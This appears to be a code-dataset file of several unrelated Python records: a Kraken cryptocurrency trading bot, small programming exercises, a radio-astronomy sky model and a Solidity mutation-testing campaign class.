BUY_REVERSAL_LOWER_THRESHOLD) and (final_reversal_index <= BUY_REVERSAL_UPPER_THRESHOLD):\r\n print(\"Final Reversal Index, {} in between {} and {}\".format(final_reversal_index, BUY_REVERSAL_LOWER_THRESHOLD, BUY_REVERSAL_UPPER_THRESHOLD))\r\n print(\"Buy signal is switched on now\")\r\n BUY_SIGNAL = True\r\n BUY_SIGNAL_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n MIN_PRICE = close_price_list[-1]\r\n\r\n else:\r\n print(\"Final Reversal Index, {} NOT in between {} and {}\".format(final_reversal_index, BUY_REVERSAL_LOWER_THRESHOLD, BUY_REVERSAL_UPPER_THRESHOLD))\r\n print(\"Reversal Condition not met...\")\r\n else:\r\n print(\"Final uptrend index and/or Final downtrend index not met requirement\")\r\n print(\"Check with second sets of buying condition, this is for detecting slow and steady uptrend\")\r\n\r\n if (final_uptrend_index >= 7.0) and (final_uptrend_index <= 7.5) and (final_downtrend_index >= 5.0) and (final_downtrend_index <= 5.5) and (final_reversal_index >= 1.8) and (final_reversal_index <= 3.0):\r\n print(\"Second set of buying conditions are satisfied...Will buy\")\r\n BOUGHT = QUANTITY * close_price_list[-1]\r\n BOUGHT_PER_UNIT = close_price_list[-1]\r\n\r\n print(\"Making Buy Order...\")\r\n for i in range(ORDER_TIMES):\r\n print(\"Order {}:\".format(i))\r\n # resp_bought = kraken_request(url_path=api_enum.USER_TRADING['ADD_ORDER'], \r\n # data={\r\n # \"nonce\": nonce_generator(),\r\n # \"ordertype\": \"market\",\r\n # \"type\": \"buy\",\r\n # \"volume\": QUANTITY,\r\n # \"pair\": TRADE_PAIR,\r\n # }, \r\n # api_key=API_KEY,\r\n # api_sec=API_SECRET_KEY)\r\n # resp_bought = resp_bought.json()\r\n resp_bought = {'error': []}\r\n # Check if there's any error\r\n if resp_bought['error'] == []:\r\n print(\"ORDER SUCCEED\")\r\n #print(\"Response: {}\".format(resp_bought['result']))\r\n print(\"Bought {} USD at {} per ETH\".format(BOUGHT, BOUGHT_PER_UNIT))\r\n BOUGHT_HIST.append(BOUGHT)\r\n BOUGHT_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n SECOND_BOUGHT_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n BOUGHT_PER_UNIT_LIST.append(BOUGHT_PER_UNIT)\r\n IN_POSITION = True\r\n BOUGHT_PRICE = close_price_list[-1]\r\n FINAL_UPTREND_INDEX_LIST.append(final_uptrend_index)\r\n FINAL_DOWNTREND_INDEX_LIST.append(final_downtrend_index)\r\n FINAL_REVERSAL_INDEX_LIST.append(final_reversal_index)\r\n \r\n else:\r\n print(\"ORDER FAILED\")\r\n print(\"Error: {}\".format(resp_bought['error']))\r\n\r\n else:\r\n print(\"Second sets of buying condition not satsified...\")\r\n\r\n elif BUY_SIGNAL == True:\r\n if (atr[-1] < 4.00):\r\n print(\"ATR is below 4.00 and buy signal is up\")\r\n print(\"Buy signal is up..will buy when the price starts rising\")\r\n MIN_PRICE = close_price_list[-1] if close_price_list[-1] < MIN_PRICE else MIN_PRICE\r\n print(\"Last atr: {}\".format(atr[-1]))\r\n print(\"Price difference: {}\".format(close_price_list[-1] - MIN_PRICE))\r\n\r\n if ((close_price_list[-1] - MIN_PRICE) < atr[-1]):\r\n print(\"Hold first since the price is still reducing\")\r\n print(\"Price diff smaller than atr\")\r\n else:\r\n print(\"Price diff is greater than atr\")\r\n print(\"Prices are increasing significantly now so buy...\")\r\n print(\"Buy since we are not in position and it is a good time to buy\")\r\n print(\"Condition satisfied:\")\r\n BOUGHT = QUANTITY * close_price_list[-1]\r\n BOUGHT_PER_UNIT = close_price_list[-1]\r\n\r\n print(\"Making Buy Order...\")\r\n for i in range(ORDER_TIMES):\r\n print(\"Order {}:\".format(i))\r\n # resp_bought = kraken_request(url_path=api_enum.USER_TRADING['ADD_ORDER'], \r\n # data={\r\n # \"nonce\": nonce_generator(),\r\n # \"ordertype\": \"market\",\r\n # \"type\": \"buy\",\r\n # \"volume\": QUANTITY,\r\n # \"pair\": TRADE_PAIR,\r\n # }, \r\n # api_key=API_KEY,\r\n # api_sec=API_SECRET_KEY)\r\n # resp_bought = resp_bought.json()\r\n resp_bought = {'error': []}\r\n # Check if there's any error\r\n if resp_bought['error'] == []:\r\n print(\"ORDER SUCCEED\")\r\n #print(\"Response: {}\".format(resp_bought['result']))\r\n print(\"Bought {} USD at {} per ETH\".format(BOUGHT, BOUGHT_PER_UNIT))\r\n BOUGHT_HIST.append(BOUGHT)\r\n BOUGHT_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n BOUGHT_PER_UNIT_LIST.append(BOUGHT_PER_UNIT)\r\n IN_POSITION = True\r\n BUY_SIGNAL = False\r\n BOUGHT_PRICE = close_price_list[-1]\r\n FINAL_UPTREND_INDEX_LIST.append(final_uptrend_index)\r\n FINAL_DOWNTREND_INDEX_LIST.append(final_downtrend_index)\r\n FINAL_REVERSAL_INDEX_LIST.append(final_reversal_index)\r\n \r\n else:\r\n print(\"ORDER FAILED\")\r\n print(\"Error: {}\".format(resp_bought['error']))\r\n else:\r\n print(\"ATR is above 4.00, Don't buy yet although buy signal is up\")\r\n\r\n\r\n else:\r\n print(\"This message should not be appearing.....Please debug\")\r\n \r\n\r\n print(\"FUI List: {}\".format(FINAL_UPTREND_INDEX_LIST))\r\n print(\"FDI List: {}\".format(FINAL_DOWNTREND_INDEX_LIST))\r\n print(\"FRI List: {}\".format(FINAL_REVERSAL_INDEX_LIST))\r\n print(\"Buy Price Per Unit: {}\".format(BOUGHT_PER_UNIT_LIST))\r\n print(\"Buy History: {}\".format(BOUGHT_HIST))\r\n print(\"Buy signal time: {}\".format(BUY_SIGNAL_TIME))\r\n print(\"Buy time: {}\".format(BOUGHT_TIME))\r\n print(\"Second Buy time: {}\".format(SECOND_BOUGHT_TIME))\r\n print(\"Sell Price Per Unit: {}\".format(SOLD_PER_UNIT_LIST))\r\n print(\"Sell History: {}\".format(SOLD_HIST))\r\n print(\"Sell signal time: {}\".format(SELL_SIGNAL_TIME))\r\n print(\"Sell time: {}\".format(SOLD_TIME))\r\n print(\"Second Sell time: {}\".format(SECOND_SOLD_TIME))\r\n\r\n if len(SOLD_HIST) == len(BOUGHT_HIST):\r\n PROFIT_HIST = np.array(SOLD_HIST) - np.array(BOUGHT_HIST)\r\n print(\"Profit History: {}\".format(PROFIT_HIST))\r\n NET_PROFIT_HIST = PROFIT_HIST - (np.array(SOLD_HIST) * KRAKEN_FEES) - (np.array(BOUGHT_HIST) * KRAKEN_FEES)\r\n print(\"Net Profit History: {}\".format(NET_PROFIT_HIST))\r\n TOTAL_PROFIT = np.sum(PROFIT_HIST)\r\n print(\"Total Profit: {}\".format(TOTAL_PROFIT))\r\n TOTAL_NET_PROFIT = np.sum(NET_PROFIT_HIST)\r\n print(\"Total Net Profit: {}\".format(TOTAL_NET_PROFIT))\r\n else:\r\n PROFIT_HIST = np.array(SOLD_HIST) - np.array(BOUGHT_HIST[:-1])\r\n print(\"Profit History: {}\".format(PROFIT_HIST))\r\n NET_PROFIT_HIST = PROFIT_HIST - (np.array(SOLD_HIST) * KRAKEN_FEES) - (np.array(BOUGHT_HIST) * KRAKEN_FEES)\r\n print(\"Net Profit History: {}\".format(NET_PROFIT_HIST))\r\n TOTAL_PROFIT = np.sum(PROFIT_HIST)\r\n print(\"Total Profit: {}\".format(TOTAL_PROFIT))\r\n TOTAL_NET_PROFIT = np.sum(NET_PROFIT_HIST)\r\n print(\"Total Net Profit: {}\".format(TOTAL_NET_PROFIT))\r\n \r\n print(\"=============================================================================================================\")\r\n\r\n\r\n elif candle_endtime_now == candle_endtime_old:\r\n # Do nothing if the price remains the same within the same candlestick timeframe\r\n # Only update the price when there's a newer price\r\n #print(\"Message received are still under the same candlestick endtime\")\r\n temp_open_price = float(loaded_msg[1][2]) if temp_open_price != float(loaded_msg[1][2]) else temp_open_price\r\n temp_high_price = float(loaded_msg[1][3]) if temp_high_price != float(loaded_msg[1][3]) else temp_high_price\r\n temp_low_price = float(loaded_msg[1][4]) if temp_low_price != float(loaded_msg[1][4]) else temp_low_price\r\n temp_close_price = float(loaded_msg[1][5]) if temp_close_price != float(loaded_msg[1][5]) else temp_close_price\r\n #print(\"Updating the candlestick price, will only append to the list when the price is finalised\")\r\n\r\n else:\r\n pass\r\n \r\n\r\n########## For WebSocket ###########\r\n\r\n\r\n########## For REST API ###########\r\ndef nonce_generator():\r\n \"\"\"\r\n Generates a 14-digit nonce (Number you only used once) by modifying the unix time stamp.\r\n This nonce will be used for every type of HTTP request that is sent to the server\r\n According to Kraken API, nounce must be continuously increasing, there's no way to reset\r\n the nounce for the API key to a lower value.\r\n \"\"\"\r\n unix_time = time.time() # e.g. 1629104436.5457473\r\n # Incase more than one HTTP request is sent within 1 second\r\n mod_unix_time = int(unix_time * 10000) # e.g. 16291044365457\r\n \r\n return mod_unix_time\r\n\r\n\r\ndef get_kraken_signature(urlpath, data, api_secret_key):\r\n \"\"\"\r\n Generate a kraken signature based on nonce, order data and API secret key.\r\n The kraken siganture will be used for every HTTP request communicated through the Kraken REST API\r\n Authenticated request should be signed with \"API-Sign\" header, using a signature generated with\r\n private key, nonce, encoded payload and URL path according to:\r\n HMAC-SHA512 of (URI path + SHA256(nonce + POST data)) and base64 decoded secret API key\r\n \"\"\"\r\n # Encode the data into a string pertaining nonce and the order information\r\n url_encoded = urllib.parse.urlencode(data)\r\n # Combine both strings together and convert it into a byte object\r\n encoded = (str(data['nonce']) + url_encoded).encode() # ENCODE: str to byte\r\n # Convert the encoded byte object into a hash. \r\n # NOTE: Hash allwos the verification of the authenticity of the message\r\n # NOTE: HMAC allows the verification of the autehtnticty and the originator of the message\r\n hashed_message = urlpath.encode() + hashlib.sha256(encoded).digest()\r\n\r\n # HMAC, Hash-based Message Authentication Code, basically provides a cryptographic key to the \r\n # client and the server, this key is only known to the specific client and the specific server\r\n # Convert the HMAC object into a bytes object by hash_mac.digest()\r\n # e.g. output b'\\xfe\\x84P\\16\\xd1\\xb3b\\x1a\\xd0\\xc2\\xaf2\r\n hash_mac = hmac.new(key=base64.b64decode(api_secret_key), msg=hashed_message, digestmod=hashlib.sha512).digest()\r\n # Encode the 64 character-HMAC into a bytes object\r\n # e.g .output b'/oRQn+ckRzevMg=='\r\n sigdigest = base64.b64encode(hash_mac)\r\n # Return the string of the byte object, ENCODE = str to byte, DECODE = byte to str\r\n return sigdigest.decode()\r\n\r\n\r\ndef kraken_request(url_path, data, api_key, api_sec):\r\n headers = {}\r\n # Get the API key\r\n headers['API-Key'] = api_key\r\n # Get the Kraken Signature\r\n headers['API-Sign'] = get_kraken_signature(urlpath=url_path, data=data, api_secret_key=API_SECRET_KEY)\r\n req = requests.post(url=(API_URL + url_path), headers=headers, data=data)\r\n return req\r\n########## For REST API ###########\r\n\r\n\r\n########## For Trading Strategy ###########\r\ndef trend_id( high_price_list, low_price_list, close_price_list, timeperiod=20, number=5 ):\r\n \"\"\"\r\n Detect whether the market is going on an uptrend or downtrend based on the highest high\r\n and the lowest low within the time period\r\n Uptrend only when the impulsive move (current highest high) doesn't fall below the pullback (lowest low) \r\n Downtrend only when the impulsive move (current lowest low) doesn't rise above the pullback (highest high)\r\n Return , \r\n \r\n \r\n \"\"\"\r\n # Return the index of the lowest low prices (Which contains many pullback for uptrending price)\r\n low_index = argrelextrema(data = np.array(low_price_list[-timeperiod:]), comparator=np.less, mode='clip')\r\n # Price of the lowest low within the defined time period\r\n low_array = np.array([low_price_list[-timeperiod:][i] for i in low_index[0]]) \r\n # Return the index of the highest high prices (Which contains many pullback for downtrending price)\r\n high_index = argrelextrema(data = np.array(high_price_list[-timeperiod:]), comparator=np.greater, mode='clip')\r\n # Price of the highest high within the defined time period\r\n high_array = np.array([high_price_list[-timeperiod:][i] for i in high_index[0]])\r\n\r\n print(\"##### Trend Detector: #####\")\r\n #if close_price_list[-1] > low_array[0]:\r\n if close_price_list[-1] > close_price_list[-timeperiod]:\r\n # Defined number of the lowest low within the defined time period\r\n # print(\"Greater than the very first pullback neckline\")\r\n print(\"Greater than the very first closing price (oldest closing price) of the time period\")\r\n # Use \"try\" incase there's not enough minima/maxima for \"find_extr_value\" function\r\n # NOTE: the \"lowest_array\" is also a support or a potential resistance\r\n lowest_array = algo_func.find_extr_value(arr=low_array, \r\n number=(len(low_array) if number > len(low_array) else number), \r\n max=False)\r\n print(\"Major uptrend pullback: {}\".format(lowest_array))\r\n print(\"##### Trend Detector #####\")\r\n trend_perc = np.round(np.sum(np.greater(close_price_list[-1], lowest_array) * 1.0) / len(lowest_array), 2)\r\n if trend_perc < 0.5:\r\n trend_perc = 1 - trend_perc\r\n return False, trend_perc, (True, lowest_array) # Second boolean indicating support/resistance, True=spt, False=resistance\r\n else:\r\n return True, trend_perc, (True, lowest_array)\r\n\r\n else:\r\n print(\"Smaller than the very first closing price (oldest closing price) of the time period \")\r\n # NOTE: the \"highest_array\" is also a resistance or a potential support\r\n highest_array = algo_func.find_extr_value(arr=high_array, \r\n number=(len(high_array) if number > len(high_array) else number), \r\n max=True)\r\n print(\"Major downtrend pullback: {}\".format(highest_array))\r\n print(\"##### Trend Detector: #####\")\r\n trend_perc = np.round(np.sum(np.less(close_price_list[-1], highest_array) * 1.0) / len(highest_array), 2)\r\n if trend_perc < 0.5:\r\n trend_perc = 1 - trend_perc\r\n return True, trend_perc, (False, highest_array) # Second boolean indicating support/resistance, True=spt, False=resistance\r\n else:\r\n return False, trend_perc, (False, highest_array) \r\n\r\n\r\n########## For Trading Strategy ###########\r\n\r\n\r\n# Define the payload that will be sent for subscription to the websocket\r\npayload = {\r\n \"event\": \"subscribe\",\r\n \"pair\": [\r\n \"ETH/USD\"\r\n ],\r\n \"subscription\": {\r\n \"name\": \"ohlc\"\r\n }\r\n}\r\n\r\n# Initialise the websocket application\r\nws = websocket.WebSocketApp(url=SOCKET, on_open=on_open, on_message=on_message, on_close=on_close)\r\n# Connect to the socket and remains forever connected until interrupted\r\nws.run_forever()\r\n","repo_name":"imseeom/Crypto-Trading-Bot-with-KrakenAPI","sub_path":"bot_v4.py","file_name":"bot_v4.py","file_ext":"py","file_size_in_byte":55717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30242963541","text":"\"\"\"\nAuthor: Le Bui Ngoc Khang\nDate: 12/07/1997\nProblem: Using the value of data from Exercise 1, write the values of the following\nexpressions:\na. data.endswith('i')\nb. \" totally \".join(data.split())\n\nSolution:\n\na. False\nb. Python totally rules!\n\n\"\"\"\n# string data page 118 exercise 01\ndata = \"Python rules!\"\n\n# data.endswith('i')\ns = data.endswith('i')\nprint(s)\n\n# \" totally \".join(data.split())\nstring_one = \" totally \"\nstring_two = data.split()\nprint(string_one.join(string_two))","repo_name":"lebuingockhang123/L-p-tr-nh-python","sub_path":"LeBuiNgocKhang_53157_CH04/Exercise/page_118_exercise_02.py","file_name":"page_118_exercise_02.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27580358416","text":"def partition(arr,start,end):\r\n i=0\r\n pivot=arr[end]\r\n p=start\r\n for i in range(start,end):\r\n if(arr[i]<=pivot):\r\n arr[i],arr[p]=arr[p],arr[i]\r\n p+=1\r\n arr[p],arr[end]=arr[end],arr[p]\r\n return (p)\r\ndef quicksort(arr,start,end):\r\n if(start differential in spatial dimensions\n # Jy is already differential in freq and time\n # Unit of multifrequency movies: Jy/sr\n # Because then: integral over time and freq and space -> J / m²\n\n # But also: we want that single-time, single-freq reconstructions have the\n # same numbers as multifreq movies\n\n if normalize_time and normalize_freq and normalize_space:\n broadcast = ift.ContractionOperator(domain, spaces=None).adjoint\n return inp*(broadcast @ inp.sum().scale(sdom.scalar_dvol/ntime/nfreq).ptw('reciprocal'))\n # return inp*(broadcast @ inp.sum().scale(sdom.scalar_dvol).ptw('reciprocal'))\n if normalize_space:\n broadcast = ift.ContractionOperator(domain, spaces=3).adjoint\n return inp*(broadcast @ inp.integrate(3).ptw('reciprocal'))\n raise NotImplementedError\n\n\ndef _cfm(*, total_domain, **kwargs):\n from ducc0.fft import good_size\n\n # Prepare domains\n pdom, tdom, fdom, sdom = total_domain\n total_domain_padded = list(total_domain)\n with_time = tdom.shape[0] > 1\n if with_time:\n dt = np.diff(tdom.coordinates)\n try:\n np.testing.assert_allclose(\n dt, dt[0]\n ) # This model work only for equidistant time\n except AssertionError:\n s = \"The Correlated Field model works only if the time domain is equispaced.\"\n raise AssertionError(s)\n dt = dt[0]\n nt = good_size(int(np.round(tdom.shape[0] * kwargs.pop(\"time_zero_padding_factor\"))))\n rg_time = ift.RGSpace(nt, dt)\n padded_tdom = rve.IRGSpace(np.arange(nt) * dt + tdom.coordinates[0])\n total_domain_padded[1] = padded_tdom\n\n foo = rg_time.distances[0] / 3600\n if foo > 1.0:\n foo = f\"{foo:.1f} h\"\n else:\n foo = f\"{foo*60:.1f} min\"\n else:\n rg_time = tdom\n\n with_freq = fdom.shape[0] > 1\n if with_freq:\n df = np.diff(fdom.coordinates)\n try:\n np.testing.assert_allclose(\n df, df[0]\n ) # This model work only for equidistant time\n except AssertionError:\n s = \"The Correlated Field model works only if the frequency domain is equispaced.\"\n raise AssertionError(s)\n df = df[0]\n nf = good_size(int(np.round(fdom.shape[0] * kwargs.pop(\"freq_zero_padding_factor\"))))\n rg_freq = ift.RGSpace(nf, df)\n padded_fdom = rve.IRGSpace(np.arange(nf) * df + fdom.coordinates[0])\n total_domain_padded[2] = padded_fdom\n else:\n rg_freq = fdom\n # /Prepare domains\n\n # Assemble operator parts\n additional = {}\n logsky = {}\n for lbl in pdom.labels:\n lbl = lbl.upper()\n\n # CFM\n cfg_zm = {\n \"offset_mean\": kwargs[f\"stokes{lbl}_zero_mode_offset\"],\n \"offset_std\": _parse_mean_std(kwargs, f\"stokes{lbl}_zero_mode\"),\n }\n\n cfg_time = {}\n cfg_space = {}\n cfg_freq = {}\n for kk in [\"fluctuations\", \"flexibility\", \"asperity\", \"loglogavgslope\"]:\n cfg_space[kk] = _parse_mean_std(kwargs, f\"stokes{lbl}_space_{kk}\")\n if with_time:\n cfg_time[kk] = _parse_mean_std(kwargs, f\"stokes{lbl}_time_{kk}\")\n if with_freq:\n cfg_freq[kk] = _parse_mean_std(kwargs, f\"stokes{lbl}_freq_{kk}\")\n\n cfm = ift.CorrelatedFieldMaker(f\"stokes{lbl} \")\n if with_time:\n cfm.add_fluctuations(rg_time, **cfg_time, prefix=\"time \")\n if with_freq:\n cfm.add_fluctuations(rg_freq, **cfg_freq, prefix=\"freq \")\n cfm.add_fluctuations(sdom, **cfg_space, prefix=\"space \")\n cfm.set_amplitude_total_offset(**cfg_zm)\n op = cfm.finalize(0)\n additional['raw sky'] = op\n # /CFM\n\n # Zero-padding\n op = op.ducktape_left((rg_time, rg_freq, sdom))\n if op.target[0].size > 1:\n tmpdom = ift.RGSpace(tdom.shape)\n tmpfdom = op.target[1]\n zeropadder = ift.FieldZeroPadder(\n (tmpdom, tmpfdom, sdom), rg_time.shape, space=0\n ).adjoint\n op = zeropadder.ducktape(op.target) @ op\n if op.target[1].size > 1:\n tmpdom = ift.RGSpace(fdom.shape)\n zeropadder = ift.FieldZeroPadder(\n (tdom, tmpdom, sdom), rg_freq.shape, space=1\n ).adjoint\n op = zeropadder.ducktape(op.target) @ op\n # /Zero-padding\n\n logsky[lbl] = op.ducktape_left((tdom, fdom, sdom))\n\n normampl = list(cfm.get_normalized_amplitudes())\n if with_freq:\n additional[f\"stokes{lbl} freq normalized power spectrum\"] = normampl.pop(0) ** 2\n if with_time:\n additional[f\"stokes{lbl} time normalized power spectrum\"] = normampl.pop(0) ** 2\n additional[f\"stokes{lbl} space normalized power spectrum\"] = normampl.pop(0) ** 2\n # /Assemble operator parts\n\n logsky = reduce(add, (oo.ducktape_left(lbl) for lbl, oo in logsky.items()))\n mexp = rve.polarization_matrix_exponential_mf2f(logsky.target, nthreads=ift.nthreads())\n \n sky = mexp @ logsky\n\n sky = sky.ducktape_left(total_domain)\n\n return sky, additional\n\n\ndef _parse_mean_std(dct, key):\n res = dct[f\"{key}_mean\"], dct[f\"{key}_std\"]\n if res == (\"None\", \"None\") or res == (None, None):\n return None\n return res\n\n\ndef _multi_freq_movie_polynom(dom, cfg_section):\n from ducc0.fft import good_size\n\n pdom, tdom, fdom, sdom = dom\n with_time = tdom.shape[0] > 1\n total_domain_padded = list(dom)\n\n if with_time:\n dt = np.diff(tdom.coordinates)\n try:\n np.testing.assert_allclose(dt, dt[0]) # This model work only for equidistant time\n except AssertionError:\n s = \"The Correlated Field model works only if the time domain is equispaced.\"\n raise AssertionError(s)\n dt = dt[0]\n nt = good_size(int(np.round(tdom.shape[0]*cfg_section.getfloat(\"time zero-padding factor\"))))\n rg_time = ift.RGSpace(nt, dt)\n padded_tdom = rve.IRGSpace(np.arange(nt)*dt + tdom.coordinates[0])\n total_domain_padded[1] = padded_tdom\n print(f\"Time domain (dt={rg_time.distances[0]/3600/24}days):\")\n print(rg_time)\n else:\n rg_time = tdom\n\n ops = {}\n for key in [\"i0\", \"alpha\", \"beta\"]:\n cfg_zm = {\n \"offset_mean\": cfg_section.getfloat(f\"{key} zero mode offset\"),\n \"offset_std\": _parse_mean_std(cfg_section, f\"{key} zero mode\"),\n }\n cfg_space, cfg_time = {}, {}\n for kk in [\"fluctuations\", \"flexibility\", \"asperity\", \"loglogavgslope\"]:\n cfg_space[kk] = _parse_mean_std(cfg_section, f\"{key} space {kk}\")\n if with_time:\n cfg_time[kk] = _parse_mean_std(cfg_section, f\"{key} time {kk}\")\n cfm = ift.CorrelatedFieldMaker(key)\n if with_time:\n cfm.add_fluctuations(rg_time, **cfg_time, prefix=\"time \")\n cfm.add_fluctuations(sdom, **cfg_space, prefix=\"space \")\n cfm.set_amplitude_total_offset(**cfg_zm)\n op = cfm.finalize(0)\n assert len(op.target.shape) == 3 if with_time else 2\n # Remove padded area\n if with_time and op.target[1].size > 1:\n tmpdom = ift.RGSpace(tdom.shape)\n zeropadder = ift.FieldZeroPadder((tmpdom, sdom), rg_time.shape, space=0).adjoint\n op = zeropadder.ducktape(op.target) @ op\n op = op.ducktape_left((tdom, sdom))\n if not with_time:\n op = op.ducktape_left((tdom,) + tuple(op.target))\n # /Remove padded area\n ops[key] = op\n additional_operators = ops\n\n freq = np.array(fdom.coordinates)\n freq0 = freq.mean()\n freq = ift.makeField(fdom, freq)\n\n cfm_expander = ift.ContractionOperator((tdom, fdom, sdom), 1).adjoint\n freq_expander = ift.ContractionOperator((tdom, fdom, sdom), (0, 2)).adjoint\n i0 = cfm_expander @ ops[\"i0\"]\n alpha = cfm_expander @ ops[\"alpha\"]\n beta = cfm_expander @ ops[\"beta\"]\n\n normalized_freq = freq_expander(ift.log(freq/freq0))\n\n logsky = i0 + ift.makeOp(normalized_freq) @ alpha + ift.makeOp(normalized_freq**2) @ beta\n\n\n sky = logsky.exp()\n\n sky = sky.ducktape_left(dom)\n\n return sky, additional_operators\n\n\ndef _fdom_prefactor(fdom, cfg_section, order=2):\n freq = np.array(fdom.coordinates)\n freq0 = freq.mean()\n freq = ift.makeField(fdom, freq)\n normalized_freq = ift.log(freq/freq0)\n freq_expander = ift.ContractionOperator(fdom, None).adjoint\n\n c = [freq_expander @ ift.NormalTransform(cfg_section.getfloat(f\"prefactor c{ii} mean\"),\n cfg_section.getfloat(f\"prefactor c{ii} stddev\"),\n f\"prefactor c{ii}\") for ii in range(order+1)]\n\n x = normalized_freq\n logop = reduce(add, (ift.makeOp(x**iorder) @ cc for iorder, cc in enumerate(c)))\n\n op = logop.exp()\n assert op.target == ift.makeDomain(fdom)\n return op\n","repo_name":"jknollm/VLBI_Resolve_EHT_SgrA","sub_path":"src/sky_model.py","file_name":"sky_model.py","file_ext":"py","file_size_in_byte":12965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9907475300","text":"#Phumelele Ndimande\r\n#Assignment 6\r\n\r\n\r\nprint(\"Independent Electoral Commission\")\r\nprint(\"--------------------------------\")\r\nname=input(\"Enter the names of parties (terminated by DONE):\\n\")\r\nparties={}\r\nif name!=\"DONE\":\r\n parties[name]=parties.get(name,1)\r\n\r\n#count entries until user types DONE\r\nwhile name!=\"DONE\":\r\n name=input(\"\")\r\n if name!=\"DONE\":\r\n parties[name]=parties.get(name,0)+1\r\nprint()\r\nprint(\"Vote counts:\")\r\n \r\n #convert keys in parties into a list \r\nlist_parties=list(parties)\r\n\r\n#sort list in alphabetical order\r\nlist_parties.sort()\r\n\r\nfor i in list_parties:\r\n print(i,\" \"*(9-len(i)),\"-\",parties[i])","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/ndmphu004/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16207428395","text":"from functools import *\n\nres = set()\n\n@lru_cache(None)\ndef f(s, e, c):\n global res\n if s == e:\n res.add(c)\n return 1\n elif s > e:\n return 0\n else:\n return f(s+1, e, c+1) + f(s+5, e, c+1) + f(s*3, e, c+1)\n\nf(1, 227, 0)\nprint(min(res))\n","repo_name":"Ivan-Black-dev/INFO_2023","sub_path":"23/3443.py","file_name":"3443.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2799093960","text":"from eth_vertigo.mutator.mutator import Mutator\nfrom eth_vertigo.mutator.truffle.solidity_file import SolidityFile\nfrom eth_vertigo.mutator.solidity.solidity_mutator import SolidityMutator\nfrom eth_vertigo.test_runner.truffle import TruffleRunnerFactory\nfrom eth_vertigo.test_runner.exceptions import EquivalentMutant\nfrom eth_vertigo.core import Mutation, MutationResult\nfrom eth_vertigo.core.campaign import Campaign\nfrom eth_vertigo.core.truffle.truffle_compiler import TruffleCompiler\nfrom eth_vertigo.test_runner.exceptions import TestRunException, TimedOut\n\nfrom typing import List, Callable\nfrom time import time\nfrom pathlib import Path\nimport logging\nfrom queue import Queue\n\n\nclass TruffleCampaign(Campaign):\n \"\"\"\n A TruffleCampaign class\n\n Implements specific campaign logic for the truffle framework\n \"\"\"\n def __init__(\n self,\n project_directory: Path,\n truffle_compiler: TruffleCompiler,\n truffle_runner_factory: TruffleRunnerFactory,\n mutators: List[Mutator],\n networks: List[str] = (),\n filters=None\n ):\n super().__init__(filters=filters)\n self.project_directory = project_directory\n self.source_directory = project_directory / \"build\" / \"contracts\"\n self.truffle_compiler = truffle_compiler\n\n self.sources = list(self._get_sources())\n self.base_run_time = None\n self.networks = networks\n self.networks_queue = Queue(maxsize=len(networks))\n self.bytecodes = {}\n\n self.truffle_runner_factory = truffle_runner_factory\n self.mutators = mutators\n self.mutators.append(SolidityMutator())\n\n for network in networks:\n self.networks_queue.put(network)\n\n def _get_sources(self, dir=None):\n \"\"\" Implements basic mutator file discovery \"\"\"\n if not (self.project_directory / \"build\").exists():\n self.truffle_compiler.run_compile_command(str(self.project_directory))\n\n dir = dir or self.source_directory\n for source_file in dir.iterdir():\n if source_file.name == \"Migrations.json\":\n continue\n if not source_file.name.endswith(\".json\"):\n continue\n yield SolidityFile(source_file)\n\n def valid(self):\n \"\"\" Checks whether the current project is valid \"\"\"\n tr = self.truffle_runner_factory.create(str(self.project_directory))\n\n begin = time()\n\n network = None\n if self.networks:\n network = self.networks_queue.get()\n try:\n test_result = tr.run_tests(network=network)\n finally:\n if self.networks:\n self.networks_queue.put(network)\n\n self.base_run_time = time() - begin\n if test_result is None:\n return False\n\n return all([result.success for result in test_result.values()])\n\n def setup(self):\n for source in self.sources:\n for mutator in self.mutators:\n self.mutations += mutator.mutate(source, self.project_directory)\n for f in self.filters:\n self.mutations = f.apply(self.mutations)\n self.is_set_up = True\n\n def test_mutation(self, mutation: Mutation, done_callback: Callable):\n \"\"\" Run the test suite using a core and check for murders \"\"\"\n tr = self.truffle_runner_factory.create(str(self.project_directory))\n mutation.result = MutationResult.LIVED\n network = None\n if self.networks:\n network = self.networks_queue.get()\n try:\n try:\n test_result = tr.run_tests(\n mutation=mutation,\n timeout=int(self.base_run_time) * 2,\n network=network,\n original_bytecode=self.bytecodes\n )\n if any(map(lambda t: not t.success, test_result.values())):\n mutation.result = MutationResult.KILLED\n except EquivalentMutant:\n mutation.result = MutationResult.EQUIVALENT\n except TimedOut:\n mutation.result = MutationResult.TIMEDOUT\n except TestRunException as e:\n logging.warning(str(e))\n mutation.result = MutationResult.ERROR\n finally:\n if self.networks:\n self.networks_queue.put(network)\n done_callback()\n return\n\n def store_compilation_results(self):\n \"\"\" Stores compilation results for trivial compiler equivalence\"\"\"\n self.bytecodes = self.truffle_compiler.get_bytecodes(working_directory=str(self.project_directory))\n","repo_name":"cucrisis/vertigo","sub_path":"eth_vertigo/core/truffle/truffle_campaign.py","file_name":"truffle_campaign.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"12649489141","text":"# from distutils.core import setup\nimport kotlin_kernel\nfrom setuptools import setup\n\n\nwith open('README.md') as f:\n readme = f.read()\n\nsetup(\n name='kotlin_kernel',\n version=kotlin_kernel.__version__,\n packages=['kotlin_kernel'],\n description='A Kotlin kernel for Jupyter',\n long_description=readme,\n author='HelgeCPH',\n author_email='ropf@itu.dk',\n url='https://github.com/HelgeCPH/kotlin_kernel',\n install_requires=[\n 